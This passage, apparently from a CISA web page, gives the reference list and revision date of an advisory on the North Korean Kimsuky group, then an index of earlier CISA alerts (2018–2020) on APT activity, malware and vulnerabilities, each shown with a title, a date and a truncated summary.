- [16] Malwarebytes: APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure
- [17] cyberscoop: North Korea could accelerate commercial espionage to meet Kim’s economic deadline
- [18] MITRE ATT&CK: Groups – Kimsuky
- [19] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [20] MITRE ATT&CK: Groups – Kimsuky
- [21] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [22] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [23] CYWARE Social: Babyshark malware continues to target nuclear and cryptocurrency industries
- [24] MITRE ATT&CK: Groups – Kimsuky
- [25] Palo Alto Networks Unit 42: BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat
- [26] McAfee: What is mshta, how can it be used and how to protect against it
- [27] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [28] Netscout: Stolen Pencil Campaign Targets Academia
- [29] MITRE ATT&CK: Groups – Kimsuky
- [30] Palo Alto Networks Unit 42: New BabyShark Malware Targets U.S. National Security Think Tanks
- [31] Netscout: Stolen Pencil Campaign Targets Academia
- [32] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [33] Private Sector Partner
- [34] Private Sector Partner
- [35] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [36] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs
- [37] Yoroi: The North Korean Kimsuky APT Keeps Threatening South Korea Evolving its TTPs
- [38] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [39] MITRE ATT&CK: Groups – Kimsuky
- [40] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [41] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [42] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [43] MITRE ATT&CK: Groups – Kimsuky
- [44] McAfee: What is mshta, how can it be used and how to protect against it
- [45] Securityweek.com: North Korean Suspected Cyber-espionage Attacks Against South Korea Entities
- [46] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [47] MITRE ATT&CK: Groups – Kimsuky
- [48] Microsoft: Detecting credential theft through memory access modelling with Microsoft Defender ATP
- [49] MITRE ATT&CK: Groups – Kimsuky
- [50] ZDNet: Cyber-espionage group uses Chrome extension to infect victims
- [51] ZDNet: Cyber-espionage group uses Chrome extension to infect victims
- [52] Netscout: Stolen Pencil Campaign Targets Academia
- [53] Netscout: Stolen Pencil Campaign Targets Academia
- [54] Private Sector Partner
- [55] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [56] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [57] Private Sector Partner
- [58] Securelist: The “Kimsuky” Operation: A North Korean APT?
- [59] Private Sector Partner
- [60] Securelist: The “Kimsuky” Operation: A North Korean APT?
Revisions
- October 27, 2020: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
AA20-296B: Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems
Original release date: October 22, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are warning that Iranian advanced persistent threat (APT) actors are likely intent on influencing an…
AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets
Original release date: October 22, 2020SummaryThis joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor ta…
AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
Original release date: October 9, 2020SummaryThis joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tec…
AA20-280A: Emotet Malware

Original release date: October 6, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
This product …
AA20-275A: Potential for China Cyber Response to Heightened U.S.–China Tensions
Original release date: October 1, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
In light of h…
AA20-266A: LokiBot Malware

Original release date: September 22, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.
This prod…
AA20-259A: Iran-Based Threat Actor Exploits VPN Vulnerabilities
Original release date: September 15, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
This produ…
AA20-258A: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
Original release date: September 14, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources a…
AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity

Original release date: September 1, 2020SummaryThis joint advisory is the result of a collaborative research effort by the cybersecurity authorities of five nations: Australia,[1] Canada,[2] New Zealand,[3][4] the United Kingdom,[5] and the United Stat…
AA20-239A: FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks

Original release date: August 26, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
This joint ad…
AA20-227A: Phishing Emails Used to Deploy KONNI Malware
Original release date: August 14, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
The Cybersecu…
AA20-225A: Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails

Original release date: August 12, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious cyber actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phi…
AA20-209A: Potential Legacy Risk from Malware Targeting QNAP NAS Devices

Original release date: July 27, 2020SummaryThis is a joint alert from the United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
CISA and NCSC are investigating a strain of…
AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902
Original release date: July 24, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this alert in response to recently disclosed exploits that target F5 BIG-IP devices that are vulnerable to CVE-2020-5902. F5 Networks, Inc…
AA20-205A: NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems
Original release date: July 23, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise and ATT&CK for Industrial Control System…
AA20-198A: Malicious Cyber Actor Use of Network Tunneling and Spoofing to Obfuscate Geolocation

Original release date: July 16, 2020SummaryThis Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) and Pre-ATT&CK frameworks. See the MITRE ATT&CK for Enterprise and Pre-ATT&CK frameworks for r…
AA20-195A: Critical Vulnerability in SAP NetWeaver AS Java
Original release date: July 13, 2020SummaryOn July 13, 2020 EST, SAP released a security update to address a critical vulnerability, CVE-2020-6287, affecting the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard. An unauthent…
AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor
Original release date: July 1, 2020SummaryThis advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) and Pre-ATT&CK framework. See the ATT&CK for Enterprise and Pre-ATT&CK frameworks for referenced thre…
AA20-182A: EINSTEIN Data Trends – 30-day Lookback
Original release date: June 30, 2020SummaryCybersecurity and Infrastructure Security Agency (CISA) analysts have compiled the top detection signatures that have been the most active over the month of May in our national Intrusion Detection System (IDS)…
AA20-133A: Top 10 Routinely Exploited Vulnerabilities
Original release date: May 12, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals …
AA20-126A: APT Groups Target Healthcare and Essential Services
Original release date: May 5, 2020SummaryThis is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
CISA an…
AA20-120A: Microsoft Office 365 Security Recommendations
Original release date: April 29, 2020SummaryAs organizations adapt or change their enterprise collaboration capabilities to meet “telework” requirements, many organizations are migrating to Microsoft Office 365 (O365) and other cloud collaboration serv…
AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching

Original release date: April 16, 2020 | Last revised: June 30, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all refer…
AA20-106A: Guidance on the North Korean Cyber Threat
Original release date: April 15, 2020SummaryThe U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the inter…
AA20-099A: COVID-19 Exploited by Malicious Cyber Actors

Original release date: April 8, 2020SummaryThis is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).
This …
AA20-073A: Enterprise VPN Security
Original release date: March 13, 2020 | Last revised: April 15, 2020SummaryAs organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or t…
AA20-049A: Ransomware Impacting Pipeline Operations
Original release date: February 18, 2020 | Last revised: June 30, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK …
AA20-031A: Detecting Citrix CVE-2019-19781
Original release date: January 31, 2020SummaryUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[1]
Tho…
AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
Original release date: January 20, 2020<br/><h3>Summary</h3><p>On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0 to address CVE-2019-…
AA20-014A: Critical Vulnerabilities in Microsoft Windows Operating Systems
Original release date: January 14, 2020SummaryNew vulnerabilities are continually emerging, but the best defense against attackers exploiting patched vulnerabilities is simple: keep software up to date. Timely patching is one of the most efficient and …
AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability
Original release date: January 10, 2020SummaryUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerabilit…
AA20-006A: Potential for Iranian Cyber Response to U.S. Military Strike in Baghdad
Original release date: January 6, 2020SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is sharing the following information with the cybersecurity community as a primer for assisting in the protection of our Nation’s critical infrastr…
AA19-339A: Dridex Malware
Original release date: December 5, 2019SummaryThis Alert is the result of recent collaboration between the Department of the Treasury Financial Sector Cyber Information Group (CIG) and the Department of the Treasury’s Financial Crimes Enforcement Netwo…
AA19-290A: Microsoft Ending Support for Windows 7 and Windows Server 2008 R2
Original release date: October 17, 2019SummaryOn January 14, 2020, Microsoft will end extended support for their Windows 7 and Windows Server 2008 R2 operating systems.[1] After this date, these products will no longer receive free technical support, o…
AA19-168A: Microsoft Operating Systems BlueKeep Vulnerability
Original release date: June 17, 2019
Summary
The Cybersecurity and Infrastructure Security Agency (CISA) is issuing this Activity Alert to provide information on a vulnerability, known as “BlueKeep,” that exists in the following Micr…
AA19-122A: New Exploits for Unsecure SAP Systems
Original release date: May 02, 2019 | Last revised: May 03, 2019
Summary
The Cybersecurity and Infrastructure Security Agency (CISA) is issuing this activity alert in response to recently disclosed exploits that target unsecure confi…
AA19-024A: DNS Infrastructure Hijacking Campaign
Original release date: January 24, 2019 | Last revised: February 13, 2019
Summary
The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain N…
AA18-337A: SamSam Ransomware
Original release date: December 3, 2018
Summary
The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform compute…
TA18-331A: 3ve – Major Online Ad Fraud Operation
Original release date: November 27, 2018
Systems Affected
Microsoft Windows
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). DHS and …
AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide
Original release date: October 11, 2018
Summary
This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States.[1][2][3][4][5] In it we highlight …
TA18-276B: Advanced Persistent Threat Activity Exploiting Managed Service Providers
Original release date: October 3, 2018
Systems Affected
Network Systems
Overview
The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service…
TA18-276A: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation
Original release date: October 3, 2018
Systems Affected
Network Systems
Overview
This technical alert addresses the exploitation of trusted network relationships and the subsequent illicit use of legitimate credentials by Advanced Persistent Threat (APT) a…
TA18-275A: HIDDEN COBRA – FASTCash Campaign
Original release date: October 2, 2018 | Last revised: December 21, 2018
Systems Affected
Retail Payment Systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Department of…
TA18-201A: Emotet Malware
Original release date: July 20, 2018
Systems Affected
Network Systems
Overview
Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet continues to be among the most costly and dest…
TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
Original release date: May 29, 2018 | Last revised: May 31, 2018
Systems Affected
Network systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Securit…
TA18-145A: Cyber Actors Target Home and Office Routers and Networked Devices Worldwide
Original release date: May 25, 2018 | Last revised: June 07, 2018
Systems Affected
Small office/home office (SOHO) routers
Networked devices
Network-attached storage (NAS) devices
Overview
Cybersecurity researchers ha…